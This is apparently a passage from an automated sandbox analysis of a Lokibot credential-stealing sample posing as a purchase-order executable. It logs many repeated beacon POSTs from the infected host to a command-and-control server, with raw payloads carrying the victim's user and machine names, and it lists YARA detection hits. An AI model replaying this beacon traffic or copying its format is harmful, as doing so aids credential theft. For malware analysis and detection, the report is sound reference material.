                    Jan 14, 2022 07:16:55.646163940 CET10922INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:54 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    5192.168.2.449770104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:21.323362112 CET1338OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:21.446059942 CET1338OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:21.577928066 CET1338INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:20 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    50192.168.2.449883104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:57.010126114 CET10923OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:57.134207010 CET10924OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:57.265400887 CET10924INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:56 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    51192.168.2.449884104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:58.361671925 CET10925OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:58.661470890 CET10925OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:58.867147923 CET10926INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:57 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    52192.168.2.449885104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:59.960262060 CET10927OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:00.083255053 CET10927OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:00.213871956 CET10927INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:59 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    53192.168.2.449886104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:01.212522984 CET10928OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:01.337017059 CET10928OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:01.469331980 CET10929INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:00 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    54192.168.2.449887104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:02.582056046 CET10930OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:02.704819918 CET10930OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:02.835235119 CET10930INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:01 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    55192.168.2.449888104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:03.930332899 CET10931OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:04.054950953 CET10931OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:04.186918974 CET10931INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:03 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    56192.168.2.449889104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:05.232615948 CET10932OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:05.355555058 CET10933OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:05.503925085 CET10933INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:04 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    57192.168.2.449890104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:06.577783108 CET10934OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:06.700897932 CET10934OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:06.833031893 CET10934INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:05 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    58192.168.2.449891104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:07.881860018 CET10935OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:08.070202112 CET10935OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:08.206795931 CET10936INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:07 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    59192.168.2.449892104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:09.745172977 CET10937OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:09.870347977 CET10937OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:10.052268028 CET10937INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:08 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    6192.168.2.449771104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:24.359164000 CET1339OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:24.483581066 CET1340OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:24.616121054 CET1340INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:23 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    60192.168.2.449893104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:11.929100037 CET10938OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:12.055680037 CET10938OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:17:12.198611021 CET10939INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:11 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    7192.168.2.449772104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:25.808697939 CET1341OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:25.955164909 CET1341OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:26.114744902 CET1341INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:24 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    8192.168.2.449773104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:27.597120047 CET1342OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:27.721211910 CET1342OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:27.853188038 CET1343INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:26 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    9192.168.2.449774104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:28.997591972 CET1343OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:29.122049093 CET1344OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:29.253197908 CET1344INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:28 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    Analysis Process: Purchase Order #5000012803.exe PID: 6940 Parent PID: 5652

                    General

                    Start time:07:15:06
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Purchase Order #5000012803.exe"
                    Imagebase:0x400000
                    File size:247015 bytes
                    MD5 hash:D62B8A5FDB90E9241FF0EEF6EA035E32
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Chronological Activities

                    Analysis Process: Purchase Order #5000012803.exe PID: 7000 Parent PID: 6940

                    General

                    Start time:07:15:07
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Purchase Order #5000012803.exe"
                    Imagebase:0x400000
                    File size:247015 bytes
                    MD5 hash:D62B8A5FDB90E9241FF0EEF6EA035E32
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.898744992.00000000006FC000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
